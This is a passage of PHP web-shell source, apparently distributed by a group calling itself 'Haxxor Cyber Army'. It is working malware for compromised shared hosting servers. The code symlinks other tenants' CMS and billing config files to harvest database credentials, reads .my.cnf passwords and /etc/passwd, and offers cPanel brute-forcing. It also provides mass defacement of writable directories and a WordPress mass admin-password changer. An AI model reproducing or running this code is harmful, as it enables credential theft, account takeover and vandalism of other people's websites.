- symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
- symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
- symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
- symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
- symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
- symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
- symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
- symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
- symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
- symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
- symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
- symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
- symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
- symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
- symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
- symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
- symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
- symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
- symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
- symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
- symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
- symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
- symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
- symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
- symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
- symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
- symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
- symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
- symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
- symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
- symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
- symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
- symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
- symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
- symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
- symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
- symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
- symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
- symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
- symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
- symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
- symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
- symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
- symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
- symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
- symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
- symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
- symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
- symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
- symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
- symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
- symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
- symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
- symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
- symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
- symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
- symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
- symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
- symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
- symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
- symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
- symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
- symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
- symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
- symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
- symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
- symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
- symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
- symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
- symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
- symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
- symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
- symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
- symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
- symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
- symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
- symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
- symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
- symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
- symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
- symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
- symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
- symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
- symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
- symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
- symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
- symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
- symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
- symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
- symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
- symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
- symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
- symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
- symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
- symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
- symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
- symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
- symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
- symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
- symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
- symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
- symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
- symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
- symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
- symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
- symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
- symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
- symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
- symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
- symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
- symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
- symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
- symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
- symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
- symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
- symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
- symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
- symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
- symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
- symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
- symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
- symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
- symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
- symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
- symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
- symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
- symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
- symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
- symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
- symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
- symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
- symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
- symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
- symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
- symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
- symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
- symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
- symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
- symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
- symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
- symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
- symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
- symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
- symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
- symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
- symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
- symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
- symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
- symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
- symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
- symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
- symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
- symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
- symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
- symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
- symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
- symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
- symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
- symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
- symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
- symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
- symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
- symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
- symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
- symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
- symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
- symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
- symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
- symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
- symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
- symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
- symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
- symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
- symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
- symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
- symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
- } $d0mains = @file("/etc/named.conf");
- if($d0mains) { mkdir($fn);
- chdir($fn);
- foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
- syml($user['name'],$domains[1][0]);
- } } } echo "<center><font color=springgreen size=3>Done</font></center>";
- echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
- } else { mkdir($fn);
- chdir($fn);
- $temp = "";
- $val1 = 0;
- $val2 = 1000;
- for(;
- $val1 <= $val2;
- $val1++) { $uid = @posix_getpwuid($val1);
- if ($uid) $temp .= join(':',$uid)."\n";
- } echo '<br/>';
- $temp = trim($temp);
- $file5 = fopen("test.txt","w");
- fputs($file5,$temp);
- fclose($file5);
- $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
- aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
- biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
- ';
- $file = fopen(".htaccess","w+");
- $write = fwrite ($file ,base64_decode($htaccess));
- $file = fopen("test.txt", "r") or exit("Unable to open file!");
- while(!feof($file)) { $s = fgets($file);
- $matches = array();
- $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
- $matches = str_replace("home/","",$matches[1]);
- if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
- syml($matches,$matches);
- } fclose($file);
- echo "</table>";
- unlink("test.txt");
- echo "<center><font color=springgreen size=3>Done</font></center>";
- echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
- } echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
- exit;
- }
- ?>
- <form method="POST" target="_blank">
- <input name="page" type="hidden" value="find">
- <table border=1>
- <body bgcolor="black" text="white"><br><br>
- <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
- <tr>
- <td>
- <strong>User :</strong>
- </td>
- <td>
- <strong><textarea cols="50" style="background:#191818;
- outline:none;
- color:white;
- " rows="5" name="usernames">
- <?php system('ls /var/mail');
- ?></textarea></strong>
- </td>
- <tr>
- <td>
- <strong>Pass :</strong>
- </td>
- <td>
- <strong><textarea cols="50" style="background:#191818;
- outline:none;
- color:white;
- " rows="5" name="passwords"></textarea></strong>
- </td>
- </tr>
- <tr>
- <td>
- <strong>Type :</strong>
- </td>
- <td>
- <span style="background:#191818;
- outline:none;
- color:white;
- "><strong>Simple : </strong> </span>
- <strong>
- <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
- <font style="background:black;
- outline:none;
- color:white;
- "><strong>/etc/passwd : </strong> </font>
- <strong>
- <input type="radio" name="type" value="passwd" style="background:black;
- outline:none;
- color:white;
- "></strong><span class="style3"><strong>
- </strong>
- </span>
- <td style="background:black;
- outline:none;
- color:white;
- " >
- <strong><input class ='bordergaya' type="submit" value="START"></strong>
- </td>
- </tr>
- </table>
- <br>
- <table border=1>
- </form>
- <tr>
- <td style="background:black;
- outline:none;
- color:white;
- ">
- <strong>Get Wordlist</strong>
- <form method="POST" target="_blank">
- <strong>
- <input name="pass" type="hidden" value="password">
- </strong>
- <strong>Url Config :</strong>
- <td>
- <strong>
- <input style="background:black;
- outline:none;
- color:white;
- " size="80" name="url" type="text"></strong>
- <td style="background:black;
- outline:none;
- color:white;
- "><strong><input class ='bordergaya' type="submit" value="GO">
- </strong>
- </td>
- </table>
- <?php echo"<br/><br/>";
- die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'massde')) {
- ?></center></center>
- <style type="text/css">
- .ketengah{
- text-align: left;
- font-size: 16px;
- color: orange;
- font-family: Homenaje;
- margin-left: 18%;
- </style>
- <?php function sabun_massal($path,$namafile,$isi_script) { if(is_writable($path)) { $patha = scandir($path);
- foreach($patha as $pathb) { $pathc = "$path/$pathb";
- $lokasi = $pathc.'/'.$namafile;
- if($pathb === '.') { file_put_contents($lokasi, $isi_script);
- } elseif($pathb === '..') { file_put_contents($lokasi, $isi_script);
- } else { if(is_dir($pathc)) { if(is_writable($pathc)) { echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>Success</font><font color=crimson>-:-</font> <font color=springgreen>Check in :</font> $lokasi</font><br>";
- file_put_contents($lokasi, $isi_script);
- $idx = sabun_massal($pathc,$namafile,$isi_script);
- } } } } } } if($_POST['start']) { echo "<div style='margin: 5px auto;
- padding: 5px'>";
- sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
- echo "</div>";
- } else { echo "<center>";
- echo "<form method='post'><br><br>
- <table>
- <tr>
- <td><font style='text-decoration: underline;
- margin-left:10px;
- '>Folder</font></td>
- <td align='center'>:</td>
- <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;
- ' height='10'><br></td>
- </tr>
- <tr>
- <td><font style='text-decoration: underline;
- margin-left:10px;
- '>Filename</font></td>
- <td align='center'>:</td>
- <td><input class='justborder' type='text' name='d_file' value='index.php' style='width: 95%;
- ' height='10'><br></td>
- </tr>
- <tr>
- <td colspan='3' align='center'><font style='text-decoration: underline;
- '>Script Deface : </font><br></td>
- </tr>
- <tr>
- <td colspan='3'><textarea class='justborder' name='script' style='width: 500px;
- height: 200px;
- '>Hacked by Haxxor Cyber Army!</textarea><br></td>
- </tr>
- <tr>
- <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;
- '><br/></td>
- </tr>
- </table><br><br><br>
- </form></center><br/>";
- }die();
- ?><center><center>
- <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc')) {
- ?>
- <form action="?path=
- <?php echo $path;
- ?>&
- x=mpc" method="post">
- <?php set_time_limit(0);
- ini_set('display_errors', 0);
- echo '<center><h2>WordPress Mass Password Changer</h2></center>';
- echo '<form method="POST" action="" >
- <center><table border="1" class="justborder"><tr><td>Config List:</td>
- <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
- <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
- <input class="justborder" type="text" name="password" size="25" value="HCA-TEAM"></td></tr></table>
- <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
- if ($_POST['action']=='1'){ if ($_POST['url']==''){ echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
- }else{ $url=$_POST['url'];
- $users = explode("\n",$url);
- foreach ($users as $user) { $user1=trim($user);
- $code=file_get_contents2($user1);
- preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;
- |isU',$code,$b1);
- $db=$b1[1][0];
- preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;
- |isU',$code,$b2);
- $user=$b2[1][0];
- preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;
- |isU',$code,$b3);
- $db_password=$b3[1][0];
- preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;
- |isU',$code,$b4);
- $host=$b4[1][0];
- preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;
- |isU',$code,$b5);
- $p=$b5[1][0];
- $d=@mysql_connect( $host, $user, $db_password ) ;
- if ($d){ @mysql_select_db($db );
- $usern=$_POST['username'];
- $passwd=$_POST['password'];
- $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';
- ";
- @mysql_query($sql) ;
- ;
- $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';
- ";
- @mysql_query($sql) ;
- ;
- $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';
- ") ;
- ;
- $siteurl=@mysql_fetch_array($aa) ;
- $siteurl=$siteurl['option_value'];
- $tr.="$siteurl\n";
- mysql_close();
- } } if ($tr) $filename = 'changed.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $tr);
- fclose($fp);
- echo "<div class='result'>Password Changing Completed ! :)<br><br>";
- echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
- } } function file_get_contents2($u){ $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL,$u);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
- curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1;
- WOW64;
- rv:12.0) Gecko/20100101 Firefox/12.0 ");
- $result = curl_exec($ch);
- return $result ;
- } echo "<br /><br />";
- die();
- ?>
- <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool')) { echo "<br/><br/>Please Choose the Key<br/><br/>";
- ?>
- <a href="?
- <?php echo "path=".$path;
- ?>&
- x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
- Or <a href="?
- <?php echo "path=".$path;
- ?>&
- x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
- Or <a href="?
- <?php echo "path=".$path;
- ?>&
- x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
- <br/><br/><br/><br/><br/>
- <?php die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang')) { echo"<br><br>
- <center><b>
- <font face='Jolly Lodger' color='gold' size='6px'> [+] HCA <font color='teal'>-</font> Team [+]</font><br>
- <br>
- <font face='Fredericka The Great' color='hotpink' size='3px'>♥
- www.haxxor-team.org ♥
- <br><br>
- -:- Cyber Security Expert -:-</font><br><br>
- <font color='lime'> Haxxor Cyber Army </font><br><br><br>
- </center>
- </b>";
- die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel')) { echo "<br/><br/>Please Choose the Key<br/><br/>";
- ?>
- <a href="?
- <?php echo "path=".$path;
- ?>&
- x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
- Or <a href="?
- <?php echo "path=".$path;
- ?>&
- x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
- <br/><br/><br/><br/>
- <?php die();
- ?>
- <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack')) {
- ?>
- <form action="?path=
- <?php echo $path;
- ?>&
- x=cpcrack" method="post">
- <?php @ini_set('display_errors',0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){ $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- } echo '<h1>Cpanel Finder/Cracker</h1><br/>';
- echo "<center>";
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains) { $domains = scandir("/var/named");
- if($domains) { echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- } } } echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
- echo '</center>';
- }else{ $d0mains = @file('/etc/named.conf');
- if($d0mains) { echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];
- } } } $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- } array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) { $r = explode(':',$d);
- if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5];
- } } $l=0;
- $j=1;
- foreach($usr as $r) { $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
